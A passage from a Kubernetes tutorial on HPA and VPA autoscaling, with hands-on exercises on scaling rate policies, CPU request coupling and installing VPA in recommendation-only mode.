&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Desired Replicas&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CPU&lt;/td&gt;
&lt;td&gt;70%&lt;/td&gt;
&lt;td&gt;50%&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RPS&lt;/td&gt;
&lt;td&gt;800&lt;/td&gt;
&lt;td&gt;400&lt;/td&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;HPA sets replicas = &lt;strong&gt;10&lt;/strong&gt;, driven by RPS. This is mathematically correct but operationally dangerous when one metric is noisy or misconfigured — a spurious spike in any single metric drives the entire replica count up. Monitor individual metric recommendations, not just the resulting replica count.&lt;/p&gt;
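&lt;p&gt;The max-not-average rule is easy to check numerically. The sketch below reuses the table's metric values with a hypothetical current count of 5 replicas, so the per-metric results differ slightly from the table's illustration:&lt;/p&gt;

```python
import math

# The max-not-average rule as a toy calculation. Metric values follow
# the table above; the current replica count of 5 is hypothetical, so
# the per-metric numbers differ slightly from the table's illustration.
def replicas_for_metrics(current, metrics):
    per_metric = [math.ceil(current * cur / tgt) for cur, tgt in metrics]
    return max(per_metric), per_metric

desired, per_metric = replicas_for_metrics(5, [(70, 50), (800, 400)])
print(per_metric, desired)   # [7, 10] 10: RPS alone sets the count
```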


&lt;h3&gt;
  
  
  CPU vs. External Metrics: An Explicit Tradeoff
&lt;/h3&gt;

&lt;p&gt;The choice of HPA signal is one of the highest-leverage tuning decisions you make. Most teams default to CPU because it requires no additional pipeline — but that convenience has a cost:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;CPU&lt;/th&gt;
&lt;th&gt;RPS / Queue Depth&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Signal freshness&lt;/td&gt;
&lt;td&gt;❌ Lagging (scrape + aggregation + sync = 45s+)&lt;/td&gt;
&lt;td&gt;✅ Near-real-time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Infra independence&lt;/td&gt;
&lt;td&gt;✅ Always available&lt;/td&gt;
&lt;td&gt;❌ Requires metrics pipeline (Prometheus Adapter, KEDA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VPA coupling risk&lt;/td&gt;
&lt;td&gt;❌ High — VPA changes requests, distorts utilization ratio&lt;/td&gt;
&lt;td&gt;✅ None — orthogonal signal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Throttling blind spot&lt;/td&gt;
&lt;td&gt;❌ Throttled CPUs appear underloaded&lt;/td&gt;
&lt;td&gt;✅ Not affected&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stability&lt;/td&gt;
&lt;td&gt;✅ High — noisy workloads still converge&lt;/td&gt;
&lt;td&gt;⚠️ Lower — noisy metrics drive unnecessary scale events&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Failure mode&lt;/td&gt;
&lt;td&gt;Under-scaling (HPA reacts too late)&lt;/td&gt;
&lt;td&gt;Over-scaling (transient metric spikes)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CPU is safer to configure but slower to react and couples badly with VPA. RPS is faster and decoupled, but requires a functioning metrics pipeline and careful target setting. Production systems often blend both — RPS as the primary signal with a CPU ceiling to catch cases where the metrics pipeline has a gap.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: VPA is a Batch System Disguised as Real-Time&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;VPA reacts on a timescale of minutes to hours, applies changes via pod restarts, and builds recommendations from historical data. Treat it as an &lt;strong&gt;offline optimizer&lt;/strong&gt; that runs continuously in the background — not a real-time controller. Its job is to right-size pods between load cycles, not to respond to them.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h3&gt;
  
  
  HPA v2 Scaling Policies
&lt;/h3&gt;

&lt;p&gt;A commonly overlooked feature of &lt;code&gt;autoscaling/v2&lt;/code&gt; is &lt;strong&gt;scaling rate policies&lt;/strong&gt;. These cap how fast replica counts can change, and in practice they are more important than stabilization windows for protecting downstream systems from traffic amplification during burst scale-out:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;behavior&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;scaleUp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;100&lt;/span&gt;        &lt;span class="c1"&gt;# at most double replicas per period&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pods&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4&lt;/span&gt;          &lt;span class="c1"&gt;# or add at most 4 pods per period&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
    &lt;span class="na"&gt;selectPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Min&lt;/span&gt;   &lt;span class="c1"&gt;# use whichever is more conservative&lt;/span&gt;
  &lt;span class="na"&gt;scaleDown&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Percent&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;120&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without explicit policies, a sudden load spike can cause HPA to jump from 3 to 50 replicas in a single sync cycle. Rate-limiting scale-out smooths the curve and gives downstream dependencies time to adapt.&lt;/p&gt;
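&lt;p&gt;Applied to a single sync period, the &lt;code&gt;scaleUp&lt;/code&gt; block above caps the jump like this (a sketch of the policy arithmetic, not the controller code):&lt;/p&gt;

```python
# Sketch of the scaleUp behavior above applied to one sync period:
# Percent 100 allows doubling, Pods 4 allows adding four, and
# selectPolicy Min takes whichever cap is tighter.
def capped_scale_up(current, desired):
    percent_cap = current * 2       # type: Percent, value: 100
    pods_cap = current + 4          # type: Pods, value: 4
    allowed = min(percent_cap, pods_cap)   # selectPolicy: Min
    return min(desired, allowed)

print(capped_scale_up(3, 50))   # 6: doubling is the tighter cap
print(capped_scale_up(10, 50))  # 14: now the plus-4 pods cap binds
```

&lt;p&gt;A raw recommendation of 50 replicas is thus released in bounded steps, one per period, rather than in a single jump.&lt;/p&gt;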




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 3: Observe Unconstrained vs. Rate-Limited Scale-Out
&lt;/h3&gt;

&lt;p&gt;This exercise demonstrates why scaling rate policies matter. You'll compare the replica jump with and without a &lt;code&gt;Pods&lt;/code&gt; rate cap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy a fresh workload with low CPU requests (makes it easy to saturate)&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment rate-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment rate-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100m
kubectl expose deployment rate-test &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80
kubectl scale deployment rate-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Create an HPA without rate policies&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: rate-test
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: rate-test
  minReplicas: 2
  maxReplicas: 20
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 30
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Blast it with load and watch the replica jump&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run 5 parallel load generators&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://rate-test; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done&lt;/span&gt;

&lt;span class="c"&gt;# Watch replicas — note the size of the jump&lt;/span&gt;
kubectl get hpa rate-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 4: Kill load, reset, and add a rate policy&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-1 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-2 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-3 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-4 &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;load-5 2&amp;gt;/dev/null &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nb"&gt;true
&lt;/span&gt;&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done
&lt;/span&gt;kubectl scale deployment rate-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2

&lt;span class="c"&gt;# Now patch the HPA with a rate cap&lt;/span&gt;
kubectl patch hpa rate-test &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  behavior:
    scaleUp:
      policies:
      - type: Pods
        value: 2
        periodSeconds: 30
      selectPolicy: Min'&lt;/span&gt;

&lt;span class="c"&gt;# Re-run the same load burst&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;kubectl run load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://rate-test; done"&lt;/span&gt; &amp;amp;
&lt;span class="k"&gt;done

&lt;/span&gt;kubectl get hpa rate-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; With no policy, replicas may jump 2→10+ in a single cycle. With the 2-pods-per-30s cap, the scale-out is gradual. Neither is always "better" — this illustrates the tradeoff between responsiveness and stability.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;i &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;1..5&lt;span class="o"&gt;}&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;kubectl delete pod load-&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done
&lt;/span&gt;kubectl delete deployment rate-test
kubectl delete hpa rate-test
kubectl delete svc rate-test
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The CPU Request Coupling Problem (Why VPA Breaks CPU HPA)
&lt;/h3&gt;

&lt;p&gt;This is the most architecturally significant HPA pitfall that teams consistently miss. CPU utilization in HPA is computed &lt;strong&gt;relative to the pod's requested CPU&lt;/strong&gt;, not actual node capacity:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cpuUtilization = currentCPUUsage / requestedCPU
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates direct coupling between resource requests and scaling behavior. If you over-request CPU (e.g., &lt;code&gt;requests: 2000m&lt;/code&gt; for a service that realistically uses 400m), computed utilization is suppressed — HPA sees a low percentage and refuses to scale out even under genuine load. Conversely, under-requesting CPU inflates utilization and causes premature scale-out.&lt;/p&gt;

&lt;p&gt;This is why VPA and HPA must be used together carefully: VPA continuously adjusts &lt;code&gt;requests&lt;/code&gt;, which directly shifts HPA's utilization baseline. Run them on separate metrics or you get a feedback loop.&lt;/p&gt;
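The coupling falls straight out of the replica formula, `desiredReplicas = ceil(currentReplicas * ratio)`, where the ratio compares observed utilization to the target. A simplified Python sketch (it ignores per-pod averaging and readiness gating; the 10% tolerance is the controller's default deadband):

```python
import math

def hpa_desired_replicas(current_replicas, usage_millicores,
                         request_millicores, target_utilization_pct,
                         tolerance=0.1):
    """Simplified HPA core math for a CPU Utilization target.
    Ignores per-pod averaging, readiness gating, and missing metrics."""
    utilization = usage_millicores / request_millicores
    ratio = utilization / (target_utilization_pct / 100.0)
    if abs(ratio - 1.0) <= tolerance:  # inside the tolerance deadband: no change
        return current_replicas
    return math.ceil(current_replicas * ratio)

# Same real usage (400m per pod), same 50% target, different requests:
over_requested = hpa_desired_replicas(4, 400, 2000, 50)  # 20% utilization
right_sized = hpa_desired_replicas(4, 400, 500, 50)      # 80% utilization
print(over_requested, right_sized)  # scales IN to 2 vs. OUT to 7
```

Nothing about the workload changed between the two calls; only the request did. That is the entire feedback surface VPA touches.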




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 4: Demonstrate CPU Request Coupling
&lt;/h3&gt;

&lt;p&gt;This exercise shows how the same real CPU usage produces different HPA behavior depending on the resource request value.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy with a very high CPU request (simulates over-provisioning)&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment coupling-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="c"&gt;# Set a deliberately inflated CPU request&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment coupling-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1000m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2000m

kubectl expose deployment coupling-test &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: coupling-test
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: coupling-test
  minReplicas: 1
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Generate load and observe the HPA metric value&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl run load-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://coupling-test; done"&lt;/span&gt;

&lt;span class="c"&gt;# Watch — the CPU utilization % will be much lower than real usage&lt;/span&gt;
&lt;span class="c"&gt;# because it's divided by the 1000m request&lt;/span&gt;
kubectl get hpa coupling-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;span class="c"&gt;# In another terminal:&lt;/span&gt;
kubectl top pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;coupling-test
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Reset with a realistic request and observe the difference&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod load-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl scale deployment coupling-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1

&lt;span class="c"&gt;# Now set a realistic (low) CPU request&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment coupling-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;500m

&lt;span class="c"&gt;# Force pod restart to pick up new requests&lt;/span&gt;
kubectl rollout restart deployment coupling-test

&lt;span class="c"&gt;# Re-run load&lt;/span&gt;
kubectl run load-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://coupling-test; done"&lt;/span&gt;

kubectl get hpa coupling-test &lt;span class="nt"&gt;--watch&lt;/span&gt;
kubectl top pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;coupling-test
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The same real CPU usage produces a dramatically different utilization percentage depending on the request. With a &lt;code&gt;1000m&lt;/code&gt; request, HPA may show 15–20% and not scale. With a &lt;code&gt;100m&lt;/code&gt; request, the same workload shows 150–200%+ and triggers aggressive scale-out. &lt;strong&gt;This is exactly the feedback loop that emerges when VPA adjusts requests while CPU-based HPA is running.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod load-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete deployment coupling-test
kubectl delete hpa coupling-test
kubectl delete svc coupling-test
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Metrics Pipeline
&lt;/h3&gt;

&lt;p&gt;HPA talks to one of three metrics APIs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;metrics.k8s.io&lt;/code&gt;&lt;/strong&gt; — Resource metrics (CPU/memory) served by &lt;code&gt;metrics-server&lt;/code&gt;, which scrapes kubelet's Summary API at ~15s resolution. End-to-end metric freshness (scrape + aggregation + HPA sync cycle) still introduces meaningful lag of 30–60s under normal conditions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;custom.metrics.k8s.io&lt;/code&gt;&lt;/strong&gt; — Arbitrary per-object metrics. Backed by adapters like Prometheus Adapter or Datadog Cluster Agent.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;external.metrics.k8s.io&lt;/code&gt;&lt;/strong&gt; — Metrics that originate outside the cluster (queue depth, SQS backlog, etc.).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F564jscnlitjg2ui1apvc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F564jscnlitjg2ui1apvc.png" alt="image" width="800" height="237"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The latency consequence&lt;/strong&gt;: CPU-based HPA reacts to load that has already materialized. For latency-sensitive services, augment with external or custom metrics that reflect current load (active connections, queue depth, RPS) rather than CPU, which lags by the full pipeline round-trip.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Scale-to-Zero
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;minReplicas&lt;/code&gt; defaults to 1; &lt;code&gt;autoscaling/v2&lt;/code&gt; permits 0, but only when the &lt;code&gt;HPAScaleToZero&lt;/code&gt; feature gate is enabled. Even then, CPU-based scaling cannot recover from zero, because with no pods there are no resource metrics to report. Scale-to-zero is only viable with external or object metrics, where the metric source exists independently of pod count. In practice, KEDA is the standard solution: it owns the zero-to-one activation decision itself and delegates one-to-N scaling to HPA, bridging the cold-start gap.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Vertical Pod Autoscaler (VPA)
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Architecture: Three Separate Components
&lt;/h3&gt;

&lt;p&gt;Unlike HPA (a single controller loop), VPA is split into three distinct processes with distinct responsibilities and failure modes:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmb42ldwaww2b3t3me7cp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmb42ldwaww2b3t3me7cp.png" alt="image" width="800" height="991"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 5: Install VPA and Observe Recommendations
&lt;/h3&gt;

&lt;p&gt;Install the VPA components and run it in &lt;code&gt;Off&lt;/code&gt; mode first — as a pure recommendation engine, with no evictions. This is the safest first step for any production environment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Install VPA from the official repo&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/kubernetes/autoscaler.git /tmp/autoscaler
&lt;span class="nb"&gt;cd&lt;/span&gt; /tmp/autoscaler/vertical-pod-autoscaler

&lt;span class="c"&gt;# Install CRDs and components&lt;/span&gt;
./hack/vpa-up.sh

&lt;span class="c"&gt;# Verify all 3 components are running&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system | &lt;span class="nb"&gt;grep &lt;/span&gt;vpa
&lt;span class="c"&gt;# Expect: vpa-admission-controller, vpa-recommender, vpa-updater&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


